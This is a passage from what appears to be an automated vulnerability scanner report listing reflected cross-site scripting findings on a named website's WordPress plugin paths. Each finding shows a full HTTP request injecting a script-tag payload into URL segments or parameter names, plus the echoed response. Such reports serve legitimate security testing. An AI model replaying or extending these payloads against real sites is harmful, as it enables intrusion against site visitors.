User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css887ac\"><script>alert(1)</script>e3828ad6376/comfeed.css" type="hidden" />
...[SNIP]...

1.148. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a4e"><script>alert(1)</script>7f607892514 was submitted in the REST URL parameter 5. This input was echoed as 37a4e\"><script>alert(1)</script>7f607892514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css37a4e"><script>alert(1)</script>7f607892514 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css37a4e\"><script>alert(1)</script>7f607892514" type="hidden" />
...[SNIP]...

1.149. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc0d"><script>alert(1)</script>0cabb235182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fc0d\"><script>alert(1)</script>0cabb235182 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css?6fc0d"><script>alert(1)</script>0cabb235182=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:16:28 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css?6fc0d\"><script>alert(1)</script>0cabb235182=1" type="hidden" />
...[SNIP]...

1.150. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b6c"><script>alert(1)</script>69a51346be6 was submitted in the REST URL parameter 1. This input was echoed as 98b6c\"><script>alert(1)</script>69a51346be6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content98b6c"><script>alert(1)</script>69a51346be6/plugins/sexybookmarks/css/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content98b6c\"><script>alert(1)</script>69a51346be6/plugins/sexybookmarks/css/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.151. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f981d"><script>alert(1)</script>66ebbffd62 was submitted in the REST URL parameter 2. This input was echoed as f981d\"><script>alert(1)</script>66ebbffd62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf981d"><script>alert(1)</script>66ebbffd62/sexybookmarks/css/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:00 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsf981d\"><script>alert(1)</script>66ebbffd62/sexybookmarks/css/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.152. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d392d"><script>alert(1)</script>5023067eea0 was submitted in the REST URL parameter 3. This input was echoed as d392d\"><script>alert(1)</script>5023067eea0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarksd392d"><script>alert(1)</script>5023067eea0/css/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarksd392d\"><script>alert(1)</script>5023067eea0/css/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.153. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1357e"><script>alert(1)</script>5f4f3762d1b was submitted in the REST URL parameter 4. This input was echoed as 1357e\"><script>alert(1)</script>5f4f3762d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css1357e"><script>alert(1)</script>5f4f3762d1b/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css1357e\"><script>alert(1)</script>5f4f3762d1b/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.154. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30032"><script>alert(1)</script>7a12e41d703 was submitted in the REST URL parameter 5. This input was echoed as 30032\"><script>alert(1)</script>7a12e41d703 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css30032"><script>alert(1)</script>7a12e41d703/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css30032\"><script>alert(1)</script>7a12e41d703/page/2" type="hidden" />
...[SNIP]...

1.155. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8170"><script>alert(1)</script>c8241c08e36 was submitted in the REST URL parameter 6. This input was echoed as e8170\"><script>alert(1)</script>c8241c08e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css/pagee8170"><script>alert(1)</script>c8241c08e36/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:20 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/pagee8170\"><script>alert(1)</script>c8241c08e36/2" type="hidden" />
...[SNIP]...

1.156. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c4f9"><script>alert(1)</script>fc715ef3f3a was submitted in the REST URL parameter 7. This input was echoed as 2c4f9\"><script>alert(1)</script>fc715ef3f3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css/page/22c4f9"><script>alert(1)</script>fc715ef3f3a HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/22c4f9\"><script>alert(1)</script>fc715ef3f3a" type="hidden" />
...[SNIP]...

1.157. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82fa0"><script>alert(1)</script>772b381c7a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82fa0\"><script>alert(1)</script>772b381c7a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2?82fa0"><script>alert(1)</script>772b381c7a8=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:32 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:17:33 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2?82fa0\"><script>alert(1)</script>772b381c7a8=1" type="hidden" />
...[SNIP]...

1.158. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9403f"><script>alert(1)</script>03e6737652b was submitted in the REST URL parameter 1. This input was echoed as 9403f\"><script>alert(1)</script>03e6737652b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9403f"><script>alert(1)</script>03e6737652b/plugins/sexybookmarks/js/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:49 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content9403f\"><script>alert(1)</script>03e6737652b/plugins/sexybookmarks/js/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.159. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbed5"><script>alert(1)</script>2ed32fd7284 was submitted in the REST URL parameter 2. This input was echoed as dbed5\"><script>alert(1)</script>2ed32fd7284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsdbed5"><script>alert(1)</script>2ed32fd7284/sexybookmarks/js/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsdbed5\"><script>alert(1)</script>2ed32fd7284/sexybookmarks/js/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.160. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270ef"><script>alert(1)</script>6359b9f266f was submitted in the REST URL parameter 3. This input was echoed as 270ef\"><script>alert(1)</script>6359b9f266f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks270ef"><script>alert(1)</script>6359b9f266f/js/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
